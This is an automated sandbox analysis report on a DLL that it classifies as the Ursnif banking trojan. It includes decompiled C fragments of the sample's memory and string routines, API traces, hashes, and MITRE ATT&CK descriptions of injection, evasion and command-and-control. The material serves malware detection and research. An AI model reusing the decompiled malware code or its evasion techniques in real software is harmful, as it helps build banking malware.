					HeapDestroy(_t7);
				}
				goto L8;
			}

0x012b4450
0x012b4457
0x012b44a1
0x012b44a3
0x012b44a3
0x012b445b
0x012b4461
0x012b4466
0x012b446a
0x012b4470
0x012b4477
0x00000000
0x00000000
0x012b4479
0x012b447e
0x00000000
0x00000000
0x00000000
0x012b447e
0x012b4480
0x012b4488
0x012b448b
0x012b448b
0x012b4491
0x012b4498
0x012b449b
0x012b449b
0x00000000

APIs

SetEvent.KERNEL32(000002EC,00000001,012B191C), ref: 012B445B
SleepEx.KERNEL32(00000064,00000001), ref: 012B446A
CloseHandle.KERNEL32(000002EC), ref: 012B448B
HeapDestroy.KERNEL32(04E50000), ref: 012B449B

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 109a6e3511390d600e9773d086bde7b4ebd55aa4e760dbfa40c17ce230e3c9c9
Instruction ID: 7a9d2d23c36992891d5911463040f5113d2b3ffea1febf8b24bd01f7496a1e8d
Opcode Fuzzy Hash: 109a6e3511390d600e9773d086bde7b4ebd55aa4e760dbfa40c17ce230e3c9c9
Instruction Fuzzy Hash: 2DF037717103979BEF307A78F9CCB923ABCEB067B57050510BA15D7189DB34D4548760

Uniqueness

Uniqueness Score: -1.00%

Function 012B4B98, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E012B4B98() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x12bd364; // 0x52495b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x12bd364; // 0x52495b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x12bd364; // 0x52495b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x12be823) {
					HeapFree( *0x12bd270, 0, _t10);
					_t7 =  *0x12bd364; // 0x52495b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x012b4b98
0x012b4ba1
0x012b4bb1
0x012b4bb1
0x012b4bb6
0x012b4bbb
0x00000000
0x00000000
0x012b4bab
0x012b4bab
0x012b4bbd
0x012b4bc2
0x012b4bc6
0x012b4bd9
0x012b4bdf
0x012b4bdf
0x012b4be8
0x012b4bea
0x012b4bee
0x012b4bf4

APIs

RtlEnterCriticalSection.NTDLL(05249570), ref: 012B4BA1
Sleep.KERNEL32(0000000A,?,012B5390), ref: 012B4BAB
HeapFree.KERNEL32(00000000,?,?,012B5390), ref: 012B4BD9
RtlLeaveCriticalSection.NTDLL(05249570), ref: 012B4BEE

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 2a080d279446461828d58748c174e1fcf20e3fe3d0b5471a88b861809c5035f6
Instruction ID: a3ace96ccec5e2d6ed0ce475d744699b270b04bc5c047fea6b11bc2f6b7de810
Opcode Fuzzy Hash: 2a080d279446461828d58748c174e1fcf20e3fe3d0b5471a88b861809c5035f6
Instruction Fuzzy Hash: F7F0FE78A192429FEB289FA8F9DDFA577A4BB45345B044419F702C735AD630EC10DF10

Uniqueness

Uniqueness Score: -1.00%

Function 6ED42439, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6ED4283E
_free.LIBCMT ref: 6ED42893

Strings

-, xrefs: 6ED426E1

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: b323647742d93f9347242615e03404c0833b8f39044c4c1a656a7023a2063108
Instruction ID: cc0ea1b4528e32e278e679e686383231262e8bdde0ceedf100881984de28c361
Opcode Fuzzy Hash: b323647742d93f9347242615e03404c0833b8f39044c4c1a656a7023a2063108
Instruction Fuzzy Hash: 62C1BF7190021ADADB649FE4CC90BEE73B8AF3535CF1044AAD949E7184EB31DA85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6ED37A9D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6ED37B2D

Strings

pow, xrefs: 6ED37B05, 6ED37B22

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: b688a44c2c9b57d9f2c1cdc1e3b25d102c0c6c8bd546db72f68c1dd5f52bf901
Instruction ID: 67dcacdb63fbf192bfa6a6831aae09a7b45f9c3414d494e627386c482f5f3048
Opcode Fuzzy Hash: b688a44c2c9b57d9f2c1cdc1e3b25d102c0c6c8bd546db72f68c1dd5f52bf901
Instruction Fuzzy Hash: 2F517D60A18913FADB41ABE4CA9039F3BB4EB53710F304D59F8E5462D8FB35C4919A86

Uniqueness

Uniqueness Score: -1.00%

Function 012B1EC1, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E012B1EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E012B75F6(_t2);
				if(_t34 != 0) {
					_t30 = E012B75F6(_t28);
					if(_t30 == 0) {
						E012B4AAB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E012BA971(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E012BA971(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x012b1ec1
0x012b1ecb
0x012b1ecd
0x012b1ed3
0x012b1ed3
0x012b1edc
0x012b1ee0
0x012b1eec
0x012b1ef0
0x012b1f64
0x012b1ef2
0x012b1ef2
0x012b1ef6
0x012b1efb
0x012b1f00
0x012b1f1a
0x012b1f09
0x012b1f09
0x012b1f0d
0x012b1f10
0x012b1f15
0x012b1f15
0x012b1f1f
0x012b1f47
0x012b1f4d
0x012b1f50
0x012b1f21
0x012b1f23
0x012b1f2b
0x012b1f36
0x012b1f3b
0x012b1f3b
0x012b1f57
0x012b1f5e
0x012b1f5f
0x012b1f5f
0x012b1ef0
0x012b1f6f

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,012B5405,00000000,00000000,751881D0,05249618,?,?,012B2A8A,?,05249618), ref: 012B1ECD

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

Part of subcall function 012BA971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,012B1EFB,00000000,00000001,00000001,?,?,012B5405,00000000,00000000,751881D0,05249618), ref: 012BA97F
Part of subcall function 012BA971: StrChrA.SHLWAPI(?,0000003F,?,?,012B5405,00000000,00000000,751881D0,05249618,?,?,012B2A8A,?,05249618,0000EA60,?), ref: 012BA989

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,012B5405,00000000,00000000,751881D0,05249618,?,?,012B2A8A), ref: 012B1F2B
lstrcpy.KERNEL32(00000000,751881D0), ref: 012B1F3B
lstrcpy.KERNEL32(00000000,00000000), ref: 012B1F47

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 758a475ab59c5016a215f0930819b9117d5150ba9dc0eed6e90343b35fcaed1d
Instruction ID: 7208bb80fef7d053dbfe408b373795b19e39ad7ed7fcad6d03920a8a800f4c99
Opcode Fuzzy Hash: 758a475ab59c5016a215f0930819b9117d5150ba9dc0eed6e90343b35fcaed1d
Instruction Fuzzy Hash: 6921B476514356AFCB125F78E8D8AEA7FB8EF663C0B058055FE059B211D770C960C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 012B131E, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E012B75F6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x012b1333
0x012b1337
0x012b1341
0x012b1346
0x012b134b
0x012b134d
0x012b1355
0x012b135a
0x012b1368
0x012b136d
0x012b1377

APIs

lstrlenW.KERNEL32(004F0053,?,75145520,00000008,05249364,?,012B50AD,004F0053,05249364,?,?,?,?,?,?,012B54EF), ref: 012B132E
lstrlenW.KERNEL32(012B50AD,?,012B50AD,004F0053,05249364,?,?,?,?,?,?,012B54EF), ref: 012B1335

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

memcpy.NTDLL(00000000,004F0053,751469A0,?,?,012B50AD,004F0053,05249364,?,?,?,?,?,?,012B54EF), ref: 012B1355
memcpy.NTDLL(751469A0,012B50AD,00000002,00000000,004F0053,751469A0,?,?,012B50AD,004F0053,05249364), ref: 012B1368

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 6972b221a793718638757744135bde2d29df35420c3bbff255390a8f6eba9261
Instruction ID: 9aa43783d047f33afdc096479e79df03da2e24a19eeb79cb1bab9224a1faaf88
Opcode Fuzzy Hash: 6972b221a793718638757744135bde2d29df35420c3bbff255390a8f6eba9261
Instruction Fuzzy Hash: B3F0F976910119BBCF11EFA9EC84CDF7BACEF493947158462FE04D7201E631EA249BA0

Uniqueness

Uniqueness Score: -1.00%

Function 012B38CA, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05249B10,00000000,00000000,74ECC740,012B467E,00000000), ref: 012B38DA
lstrlen.KERNEL32(?), ref: 012B38E2

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

lstrcpy.KERNEL32(00000000,05249B10), ref: 012B38F6
lstrcat.KERNEL32(00000000,?), ref: 012B3901

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 7234323e4574ec85a2beec74fddac1f8f7e6a1d827916b6ffe48f60247ab0760
Instruction ID: a67094038eeaacd46e69cde5865f0cc057299662897039df11782e32934a5884
Opcode Fuzzy Hash: 7234323e4574ec85a2beec74fddac1f8f7e6a1d827916b6ffe48f60247ab0760
Instruction Fuzzy Hash: 72E092339016256787219BE8BC8CCABBFACEFCA7503040817FB00D3105C73088118BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 3056 Parent PID: 3708 rundll32.exeCOMMON

Executed Functions

Non-executed Functions

Function 0069F8DA, Relevance: 5.1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

Strings

q, xrefs: 0069F8E1
q, xrefs: 0069F945
q, xrefs: 0069F905
q, xrefs: 0069F8FD

Memory Dump Source

Source File: 00000006.00000002.546338024.000000000069B000.00000004.00000001.sdmp, Offset: 0069B000, based on PE: false

Similarity

API ID:
String ID: q$q$q$q
API String ID: 0-594874556
Opcode ID: 156ddae598c0bab019b6790af6d22aa63ad7faa8a9b4ecc510ea7861ae1d3eb1
Instruction ID: e1dd70232aa5fe5b4cfc41874f30db3a65febb36f0f46d23ead3643a0399a914
Opcode Fuzzy Hash: 156ddae598c0bab019b6790af6d22aa63ad7faa8a9b4ecc510ea7861ae1d3eb1
Instruction Fuzzy Hash: 951127A584E3C26FCB435B749A221503F355E23220B2B10E7C880CF5F3E1594A49D733

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 6yDD19jMIu.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Function 6ECE15C6, Relevance: 13.6, APIs: 9, Instructions: 120
sleepnativesynchronizationCOMMON

Function 6ECE1172, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 0075A82B, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 00755D10, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 6ECE13B8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6ECE1DE5, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6ECE1273, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 007544A4, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Function 00755461, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Function 00753598, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 00754151, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 6ECE19C2, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6ECE1B59, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 0075262F, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Function 6ECE153C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 0075520D, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 007578E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Function 00754F07, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Function 6ECE189E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 6ECE1719, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 00759311, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Function 0075121A, Relevance: 4.6, APIs: 3, Instructions: 97
COMMON

Function 0075502E, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 6ECE12B5, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 00755141, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Function 00757749, Relevance: 3.1, APIs: 2, Instructions: 124
COMMON

Function 0075144D, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON